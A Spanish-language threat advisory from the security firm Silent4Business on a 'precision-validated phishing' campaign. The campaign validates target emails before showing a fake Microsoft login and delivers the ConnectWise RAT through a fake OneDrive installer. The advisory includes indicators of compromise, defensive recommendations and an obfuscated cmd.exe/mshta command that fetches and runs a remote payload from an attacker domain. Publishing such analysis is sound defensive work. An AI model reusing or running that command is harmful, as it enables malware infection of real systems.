Alerta por nueva amenaza de “Precision- Validated Phishing” 

¿Por qué este nuevo phishing es más difícil de detectar? 

Hoy en día, el phishing de precisión y las amenazas cibernéticas representan un reto significativo para las organizaciones. Su objetivo es eludir las defensas tradicionales de las organizaciones y comprometer activos críticos mediante tácticas cada vez más sofisticadas. Una de las técnicas más recientes que ha captado la atención del equipo de CTI-S4B es el Precision-Validated Phishing, una modalidad de ataque selectiva que representa un riesgo creciente para organizaciones de todos los tamaños. 

Phishing de precisión: nueva táctica validada

A diferencia del phishing tradicional —que depende del envío masivo de correos esperando que alguno funcione—, el phishing validado de precisión se enfoca en objetivos de alto valor. Esta técnica verifica en tiempo real si una dirección de correo electrónico es activa y legítima, y es entonces así que muestra el contenido malicioso. De esta manera, se mejora la eficiencia del ataque, además que también complica el análisis por parte de los sistemas de seguridad automatizados y en los entornos sandbox. 

En estas campañas, el pretexto más utilizado es un supuesto “recordatorio de eliminación de archivos”, incitando al usuario a actuar de inmediato. Seguido de esta acción y que se procede a dar clic en el enlace del correo, se accede a una página con opciones de “Vista previa” y “Descarga” de documentos, cada una representando un tipo de ataque diferente, pero que al final persiguen el mismo objetivo: comprometer al usuario. 

Phishing de precisión: Tácticas avanzadas

Robo de credenciales vía phishing de precisión

Al seleccionar la opción de vista previa, el usuario es redirigido a una página que simula el inicio de sesión de Microsoft. Antes de continuar, es importante destacar que, previo a mostrar el formulario falso, el sitio hace la validación del correo electrónico con una base de datos recopilada previamente por los atacantes. En caso de uno correo no encontrado, el sitio redirige a una página legítima, evita así ser detectado por herramientas de análisis automatizado. 

Gracias a esta táctica los intentos exitosos de phishing aumenten significativamente, ya que las credenciales obtenidas provienen de cuentas activas y en uso. Esto incrementa el valor para los atacantes, ya sea para su explotación directa o venta en mercados clandestinos.

Descarga de malware y amenazas persistentes

Por otro lado, al hacer clic en “Descarga”, se baja un archivo llamado SecuredOneDrive.ClientSetup.exe, que finge ser una instalación legítima de OneDrive. En realidad, se trata de una cadena de infección que culmina con la ejecución del ConnectWise RAT, un troyano con funcionalidades avanzadas como keylogger, captura de pantalla y ejecución remota de código. 

Este malware se distribuye mediante archivos comprimidos que contienen accesos directos en formato .lnk. Bajo nombres como Items inside.lnk, Photo.lnk y Box and labels outside.lnk, están diseñados para engañar al usuario y activar un script remoto mediante PowerShell, además descarga y ejecuta el RAT de manera discreta. Para combatir el phishing de precisión y amenazas cibernéticas, es crucial adoptar un enfoque proactivo en la seguridad.  

• “C:\Windows\System32\cmd.exe” /c “set a=start ms&&set b=hta ht&&set c=tps://&&set d=g2-web[.]xyz/xcdoc/webdoc721[.]html&&call set f=%a%%b%%c%%d%&&call %f%”&&exit 

Posible vector de ataque: 

• Ingeniería social.  

Impacto operativo: 

• Robo de información sensible, posible acceso no autorizado a cuentas personales y corporativas. 

Región afectada: 

• Internacional 

Indicadores de Compromiso (IoCs)  

El equipo de CTI de Silent4Business ha identificado los siguientes indicadores de compromiso (IoCs) vinculados a esta amenaza.    

MD5  

• 8a17521918bc248d3ef11de3ba36926f 

• b9cd7bc4f514e595561509de2177e457 

• 495c7845de1d5bd46884ef03d66d4447 

SHA-1  

• 81b043d61cd7044c91f6f3a0eabc79ecab8e47d9 

• 45edd28311bb576e25807de94995fae83c442ab2 

• 7aa2075082a22abd425c6c3cd03c76e3fc193886 

SHA-256  

• aae6ae55eba4ca78041c35694a65ac08a8e6ed54eb377398e93d6a985d7b1cc7 

• ec1c7f33fd871b544a2992c0af60cde0ffcc829e7bf73baad6470f4225761ef2 

• 06df948c816fc30e69d3ea30733d0d11989c9bfd68f3d3919ceef3f8410ea1bb

Direcciones URL   

• hXXps://www[.]files[.]fm/u/jv2stwauw7 

• hXXps://femaxpipeworks[.]com/LgGxTNCi 

• hXXps://apsxsecured[.]screenconnect[.]com/Bin/SecuredOnedrive[.]ClientSetup[.]exe?e=Access&y=Guest 

• hXXp[://]instance-i4zsy0-relay[.]screenconnect[.]com:443 

IPs 

• 172[.]67[.]75[.]107 
  104[.]26[.]0[.]31 
  104[.]26[.]1[.]31 

• 64[.]72[.]205[.]63 
  139[.]178[.]89[.]78 

Protegiendo tu empresa del phishing de precisión y amenazas cibernéticas

Ante este panorama y las multiples amenazas avanzadas, es esencial que las organizaciones adopten una postura proactiva. Algunas recomendaciones incluyen: 

• Capacitación continua a empleados sobre detección de correos sospechosos. 

• Monitoreo constante de eventos de red y actividades inusuales. 

• Revisión de políticas de autenticación, implementando MFA (autenticación multifactor). 

• Colaboración con especialistas que puedan detectar e interpretar señales débiles antes de que se conviertan en incidentes.  

Conclusiones

Mantenerse informado sobre el phishing de precisión y amenazas cibernéticas es fundamental para mitigar riesgos. Tener conciencia sobre estos ataques y herramientas tradicionales de protección, te ayudara a tener prevención, ya que estas amenazan cada vez son más silenciosa y selectivas. Diversos informes recientes revelan un incremento significativo dentro del mundo empresarial.

En Silent4Business, el equipo de CTI-S4B mantiene una vigilancia activa sobre este tipo de campañas. Nuestra experiencia en ciberinteligencia y servicios de consultoría nos permite ofrecer soluciones personalizadas para anticipar riesgos y proteger a las organizaciones en un entorno digital en constante cambio. Solicita una Consultoría en https://silent4business.com/contacto y fortalece tu ciberseguridad.